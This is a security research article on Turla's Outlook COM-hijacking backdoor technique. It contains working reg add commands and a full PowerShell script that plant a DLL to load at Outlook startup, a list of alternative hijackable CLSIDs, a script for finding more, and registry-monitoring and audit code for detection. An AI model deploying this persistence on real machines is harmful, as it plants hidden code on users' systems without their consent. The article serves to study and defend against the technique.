0x00 Preface

---

A backdoor technique used by the APT group Turla: a DLL is loaded when Outlook starts, by way of COM hijacking. Its notable property is that it needs only the current user's privileges to achieve persistence.

This article tests the method based on the publicly available information, develops an automated exploitation script, explores extended usage, shares multiple viable hijacking locations, and gives defense recommendations derived from the exploitation approach.

References:

https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf

0x01 Introduction

---

This article will cover the following:

  • Exploitation Method
  • Details of PowerShell Script Implementation
  • Extended Usage
  • Defense Recommendations

0x02 Exploitation Method

---

Outlook instantiates multiple COM objects during startup. By adding registry entries that redirect one of those objects to a DLL of our choosing, we hijack the startup sequence and get the DLL loaded into the Outlook process.

The method needs registry entries for two COM objects: the first redirects a CLSID that Outlook actually requests to our own CLSID via TreatAs, and the second registers our DLL as the in-process server for that CLSID.

Because everything is written under HKCU\Software\Classes, which COM merges with HKLM\Software\Classes and gives precedence for a non-elevated process such as Outlook, current user privileges are sufficient. (Elevated, high-integrity processes ignore per-user COM registrations, so this only works against processes running at the user's normal integrity level.)

(1) COM Object 1, used to load the second COM object

Add the following registry entry:

HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs = {49CBB1C7-97D1-485A-9EC1-A26065633066}

The command to implement this via command line is as follows:

reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f

(2) COM Object 2, used to load the DLL

Add the following registry entries:

HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} = Mail Plugin
HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 = [Path to the backdoor DLL]
HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32\ThreadingModel = Apartment

The command to implement this via command line is as follows:

reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "c:\test\calc.dll" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f

calc.dll can be the test DLL from the earlier article, available at: an open-source project

After adding the registry entries, launch Outlook. Outlook loads the DLL several times during startup, so several calculators pop up; a mutex in the DLL can be used to ensure that only one calculator is spawned. DLL download address:

an open-source project

On 64-bit Windows with 32-bit Office installed, Outlook is a 32-bit process and reads the WOW64 view of the registry, so both COM objects must instead be registered under HKCU\Software\Classes\Wow6432Node\CLSID\

0x03 PowerShell Script Implementation Details

---

The implementation process is as follows:

  1. Determine the operating system bitness
  2. Determine the Office software version
  3. If it's a 64-bit system with 32-bit Office installed, the registry location is HKCU\Software\Classes\Wow6432Node\CLSID\; otherwise, the registry location is HKCU\Software\Classes\CLSID\
  4. Add the corresponding registry entries

The specific code is as follows:

1. Determine the operating system bitness

# [IntPtr]::Size reflects the bitness of the PowerShell process, not of the OS: a
# 32-bit PowerShell host on 64-bit Windows reports 4. Ask the OS directly instead.
if ([Environment]::Is64BitOperatingSystem)
{
'64-bit'
}
else
{
'32-bit'
}

2. Determine the installed Office software version

Check whether the default installation path C:\Program Files\Microsoft Office contains a MEDIA folder.

If it does, Office is 64-bit; otherwise Office is 32-bit (on 64-bit Windows a 32-bit Office installs under C:\Program Files (x86) instead). This is a heuristic tied to the default install location and to the MEDIA folder being present; a more robust check is the Bitness value (x86 or x64) that Office writes under HKLM\SOFTWARE\Microsoft\Office\<version>\Outlook (under Wow6432Node for a 32-bit Office on 64-bit Windows).

PowerShell code is as follows:

Try
{
# The path must be quoted (it contains spaces), and -ErrorAction Stop turns the
# missing-directory error into a terminating one so that the Catch block runs.
# Unquoted, dir would bind "Files\Microsoft" as the -Filter and fail on the third
# argument, so the Catch branch would run on every machine.
dir "C:\Program Files\Microsoft Office\MEDIA" -ErrorAction Stop | Out-Null
Write-Host "Microsoft Office: 64-bit"
}
Catch
{
Write-Host "Microsoft Office: 32-bit"
}

The implementation code has been open-sourced at the following address:

An open-source project

The code automatically determines the operating system architecture and the Office bitness, then adds the corresponding registry entries.
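The complete procedure from 0x02 and 0x03 as one PowerShell script. This is an added example written for this page, not the author's released script: it picks the CLSID hive that the Outlook process will actually read and then writes the two COM objects. It assumes the DLL path is a placeholder, reads Outlook's bitness from the Bitness value Office writes under HKLM\SOFTWARE\Microsoft\Office\<version>\Outlook, and falls back to the article's MEDIA-folder heuristic when that value is absent.

```powershell
# Added example (not the author's released script): register the two COM objects
# described in 0x02 from PowerShell, writing to the CLSID hive that the Outlook
# process will actually read. Assumptions: $DllPath is a placeholder for the test
# DLL; Outlook bitness is taken from the "Bitness" value Office writes under
# HKLM\SOFTWARE\Microsoft\Office\<version>\Outlook, with the article's MEDIA-folder
# heuristic as a fallback. Run as the target user; no elevation is required.
param(
    [string]$DllPath = 'C:\test\calc.dll'   # placeholder path to the payload DLL
)

$HijackedClsid = '{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}'   # COM object 1: requested by Outlook at startup
$PayloadClsid  = '{49CBB1C7-97D1-485A-9EC1-A26065633066}'   # COM object 2: our InprocServer32

function Get-OutlookBitness {
    # Office records 'x86' or 'x64' in ...\Office\<ver>\Outlook\Bitness; a 32-bit
    # Office on 64-bit Windows keeps its keys under the Wow6432Node view.
    $roots = 'HKLM:\SOFTWARE\Microsoft\Office', 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office'
    foreach ($root in $roots) {
        foreach ($ver in '16.0', '15.0', '14.0') {
            $key = "$root\$ver\Outlook"
            $bitness = (Get-ItemProperty -Path $key -Name Bitness -ErrorAction SilentlyContinue).Bitness
            if ($bitness) { return $bitness }
        }
    }
    # Fallback to the article's heuristic: 64-bit Office installs MEDIA under Program Files.
    if (Test-Path 'C:\Program Files\Microsoft Office\MEDIA') { return 'x64' }
    return 'x86'
}

function Get-ClsidRoot {
    param([bool]$Is64BitOs, [string]$OutlookBitness)
    # Only a 32-bit Outlook on a 64-bit OS reads the WOW64 view of HKCU\Software\Classes.
    if ($Is64BitOs -and $OutlookBitness -eq 'x86') {
        return 'HKCU:\Software\Classes\Wow6432Node\CLSID'
    }
    return 'HKCU:\Software\Classes\CLSID'
}

$is64BitOs  = [Environment]::Is64BitOperatingSystem   # OS bitness, independent of the PowerShell host
$outlookBit = Get-OutlookBitness
$ClsidRoot  = Get-ClsidRoot -Is64BitOs $is64BitOs -OutlookBitness $outlookBit
Write-Host "64-bit OS: $is64BitOs, Outlook: $outlookBit, writing under $ClsidRoot"

# COM object 1: TreatAs redirects the CLSID Outlook asks for to our CLSID.
$hijackedKey = "$ClsidRoot\$HijackedClsid"
$treatAsKey  = "$hijackedKey\TreatAs"
New-Item -Path $hijackedKey -Force | Out-Null
New-Item -Path $treatAsKey  -Force | Out-Null
Set-ItemProperty -Path $treatAsKey -Name '(Default)' -Value $PayloadClsid

# COM object 2: InprocServer32 names the DLL; ThreadingModel = Apartment as in the reference.
$payloadKey = "$ClsidRoot\$PayloadClsid"
$inprocKey  = "$payloadKey\InprocServer32"
New-Item -Path $payloadKey -Force | Out-Null
New-Item -Path $inprocKey  -Force | Out-Null
Set-ItemProperty -Path $payloadKey -Name '(Default)' -Value 'Mail Plugin'
Set-ItemProperty -Path $inprocKey  -Name '(Default)' -Value $DllPath
Set-ItemProperty -Path $inprocKey  -Name 'ThreadingModel' -Value 'Apartment'

# Show what was written; Outlook loads $DllPath on its next start.
Get-ItemProperty -Path $treatAsKey, $inprocKey | Format-List
```

The hive decision is isolated in Get-ClsidRoot so that it can be exercised without touching the registry; the only case that needs the Wow6432Node view is a 32-bit Outlook on a 64-bit OS, since a 64-bit Outlook and any Outlook on a 32-bit OS read the native CLSID key.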

0x04 Extended Usage

---

Use Process Monitor to record Outlook's startup and identify other usable COM objects: a CLSID that Outlook opens under HKCU\Software\Classes\CLSID (or the Wow6432Node view), receives NAME NOT FOUND for, and then resolves from the machine-wide registration is a candidate that we can pre-empt with our own per-user key.

Testing found multiple usable objects in Outlook 2013.

Replace COM object 1 with any of the following while keeping COM object 2 unchanged (the list was obtained on Outlook 2013 and may differ in other versions):

Available COM object 1:

  • {B056521A-9B10-425E-B616-1FCD828DB3B1}
  • {EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120}
  • {93E5752E-B889-47C5-8545-654EE2533C64}
  • {56FDF344-FD6D-11D0-958A-006097C9A090}
  • {2163EB1F-3FD9-4212-A41F-81D1F933597F}
  • {A6A2383F-AD50-4D52-8110-3508275E77F7}
  • {F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}
  • {88D96A05-F192-11D4-A65F-0040963251E5}
  • {807583E5-5146-11D5-A672-00B0D022E945}
  • {529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
  • {3CE74DE4-53D3-4D74-8B83-431B3828BA53}
  • {A4B544A1-438D-4B41-9325-869523E2D6C7}
  • {33C53A50-F456-4884-B049-85FD643ECFED}
  • {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}
  • {275C23E2-3747-11D0-9FEA-00AA003F8646}
  • {C15BB852-6F97-11D3-A990-00104B2A619F}
  • {ED475410-B0D6-11D2-8C3B-00104B2A6676}
  • {1299CF18-C4F5-4B6A-BB0F-2299F0398E27}
  • {DCB00C01-570F-4A9B-8D69-199FDBA5723B}
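The hunting step that produces such a list, as an added example that is not part of the original article: a PowerShell function that reads a Process Monitor CSV export of Outlook's startup and reports the CLSIDs that Outlook looked up under the per-user hive without finding them. It assumes Procmon's default export columns ("Process Name", "Operation", "Path", "Result"); the $SampleLog rows are constructed for the example, not a real capture.

```powershell
# Added example (not from the original article): parse a Process Monitor CSV export
# of Outlook's startup and list the CLSIDs that Outlook looked up under the per-user
# hive without finding them. Assumptions: the CSV has Procmon's default export
# columns ("Process Name", "Operation", "Path", "Result"); $SampleLog below is
# constructed sample data, not a real capture.
$SampleLog = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1234567 AM","OUTLOOK.EXE","4120","RegOpenKey","HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}","NAME NOT FOUND","Desired Access: Read"
"10:01:02.1234890 AM","OUTLOOK.EXE","4120","RegOpenKey","HKCR\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}","SUCCESS","Desired Access: Read"
"10:01:02.1235001 AM","OUTLOOK.EXE","4120","RegOpenKey","HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs","NAME NOT FOUND","Desired Access: Read"
"10:01:02.2000000 AM","OUTLOOK.EXE","4120","RegOpenKey","HKCU\Software\Classes\Wow6432Node\CLSID\{B056521A-9B10-425E-B616-1FCD828DB3B1}","NAME NOT FOUND","Desired Access: Read"
"10:01:02.3000000 AM","OUTLOOK.EXE","4120","RegOpenKey","HKCU\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000001}","SUCCESS","Desired Access: Read"
"10:01:02.4000000 AM","explorer.exe","1234","RegOpenKey","HKCU\Software\Classes\CLSID\{EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120}","NAME NOT FOUND","Desired Access: Read"
'@

function Get-HijackCandidates {
    param(
        [Parameter(Mandatory)] [object[]] $Events,      # rows from Import-Csv / ConvertFrom-Csv
        [string] $ProcessName = 'OUTLOOK.EXE'
    )
    # A top-level CLSID key (not a subkey such as \TreatAs) that the process opened
    # under HKCU and did not find is one we can create ourselves.
    $pattern = '^HKCU\\Software\\Classes\\(?<wow>Wow6432Node\\)?CLSID\\(?<clsid>\{[0-9A-Fa-f-]{36}\})$'
    $Events | ForEach-Object {
        if ($_.'Process Name' -eq $ProcessName -and
            $_.Operation -eq 'RegOpenKey' -and
            $_.Result -eq 'NAME NOT FOUND' -and
            $_.Path -match $pattern) {
            $hive = if ($Matches.wow) { 'HKCU\Software\Classes\Wow6432Node\CLSID' } else { 'HKCU\Software\Classes\CLSID' }
            [pscustomobject]@{ Clsid = $Matches.clsid.ToUpper(); Hive = $hive }
        }
    } | Sort-Object Clsid, Hive -Unique
}

# Usage with the constructed sample; for a real capture use: Import-Csv .\outlook-start.csv
$candidates = Get-HijackCandidates -Events ($SampleLog | ConvertFrom-Csv)
foreach ($c in $candidates) {
    # A candidate is only useful as "COM object 1" if the CLSID exists machine-wide,
    # so that Outlook's lookup still succeeds once our per-user TreatAs is in place.
    $machineKey = 'HKLM:\Software\Classes\' + ($c.Hive -replace '^HKCU\\Software\\Classes\\', '') + '\' + $c.Clsid
    '{0} under {1} (registered in HKLM: {2})' -f $c.Clsid, $c.Hive, (Test-Path $machineKey)
}
```

With the constructed sample, the two CLSIDs that Outlook failed to find under HKCU are reported with their hive; the probe of the TreatAs subkey, the key that already existed, and explorer.exe's lookup are all filtered out. On a real capture, set a Procmon filter on Process Name is OUTLOOK.EXE before exporting to keep the CSV small.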

0x05 Defense Recommendations

---

Monitor key creation and value-set operations under the following registry keys (the per-user COM registration hives, which a non-elevated process such as Outlook consults before HKLM):

  • HKCU\Software\Classes\CLSID\
  • HKCU\Software\Classes\Wow6432Node\CLSID\

In particular, a TreatAs value under HKCU, a per-user CLSID key that shadows a CLSID already registered under HKLM, or an InprocServer32 default value pointing to a DLL in a user-writable location is rare in legitimate software and worth investigating. Sysmon RegistryEvent (event IDs 12 and 13) can be scoped to these paths for real-time monitoring.
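A PowerShell audit for hosts without such monitoring, added here as an example and not part of the original article: it enumerates both per-user CLSID hives and flags the entries that carry the marks of this hijack. The triage rules (a TreatAs under HKCU, a per-user key that shadows a machine-wide CLSID, an in-process server outside Program Files or Windows) are this example's own heuristics, not a complete detection; $SampleEntries is constructed data that mirrors the keys written in 0x02.

```powershell
# Added example (not from the original article): audit the two per-user CLSID hives
# named above and flag entries that carry the marks of this hijack. Assumptions: the
# triage rules (a TreatAs under HKCU, a per-user key that shadows a machine-wide CLSID,
# an in-process server outside Program Files / Windows) are this example's own
# heuristics, not a complete detection; $SampleEntries is constructed data.
function Get-UserComRegistrations {
    # Enumerate every per-user CLSID in both the native and the WOW64 view.
    $roots = 'HKCU:\Software\Classes\CLSID', 'HKCU:\Software\Classes\Wow6432Node\CLSID'
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($key in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
            $clsid   = $key.PSChildName
            $treatAs = (Get-ItemProperty -Path "$($key.PSPath)\TreatAs" -ErrorAction SilentlyContinue).'(default)'
            $server  = (Get-ItemProperty -Path "$($key.PSPath)\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
            [pscustomobject]@{
                Hive              = $root
                Clsid             = $clsid
                TreatAs           = $treatAs
                InprocServer32    = $server
                # the same CLSID under HKLM means the per-user key shadows a legitimate object
                MachineRegistered = Test-Path ($root.Replace('HKCU:', 'HKLM:') + '\' + $clsid)
            }
        }
    }
}

function Test-ComHijackIndicators {
    param([Parameter(Mandatory)] $Entry)
    # Returns the list of reasons an entry looks suspicious (empty when it looks benign).
    $reasons = @()
    if ($Entry.TreatAs) { $reasons += "TreatAs redirection under HKCU to $($Entry.TreatAs)" }
    if ($Entry.MachineRegistered) { $reasons += 'per-user key shadows a machine-wide CLSID' }
    if ($Entry.InprocServer32 -and
        $Entry.InprocServer32 -notmatch '^"?[A-Za-z]:\\(Program Files( \(x86\))?|Windows)\\') {
        $reasons += "in-process server outside Program Files/Windows: $($Entry.InprocServer32)"
    }
    return $reasons
}

# Constructed sample: the two keys from 0x02 plus a hypothetical vendor add-in (fake CLSID).
$SampleEntries = @(
    [pscustomobject]@{ Hive = 'HKCU:\Software\Classes\CLSID'; Clsid = '{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}'
                       TreatAs = '{49CBB1C7-97D1-485A-9EC1-A26065633066}'; InprocServer32 = $null; MachineRegistered = $true }
    [pscustomobject]@{ Hive = 'HKCU:\Software\Classes\CLSID'; Clsid = '{49CBB1C7-97D1-485A-9EC1-A26065633066}'
                       TreatAs = $null; InprocServer32 = 'c:\test\calc.dll'; MachineRegistered = $false }
    [pscustomobject]@{ Hive = 'HKCU:\Software\Classes\CLSID'; Clsid = '{11111111-2222-3333-4444-555555555555}'
                       TreatAs = $null; InprocServer32 = 'C:\Program Files\Vendor\addin.dll'; MachineRegistered = $false }
)

# Triage the sample first, then whatever is actually registered for the current user.
foreach ($e in ($SampleEntries + @(Get-UserComRegistrations))) {
    $why = Test-ComHijackIndicators -Entry $e
    if ($why.Count -gt 0) {
        '{0}\{1}: {2}' -f $e.Hive, $e.Clsid, ($why -join '; ')
    }
}
```

In the sample, the first two entries are reported (the TreatAs redirection that shadows a machine-wide CLSID, and the in-process server under c:\test) while the vendor add-in under Program Files is not. Once a hit is confirmed, removing the per-user key (Remove-Item -Path "HKCU:\Software\Classes\CLSID\{...}" -Recurse) is enough to restore the machine-wide object, since HKCU only overlays HKLM.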

0x06 Summary

---

This article introduces a method to load a DLL during Outlook startup via COM hijacking, shares multiple available hijacking locations, and provides defense recommendations based on exploitation techniques.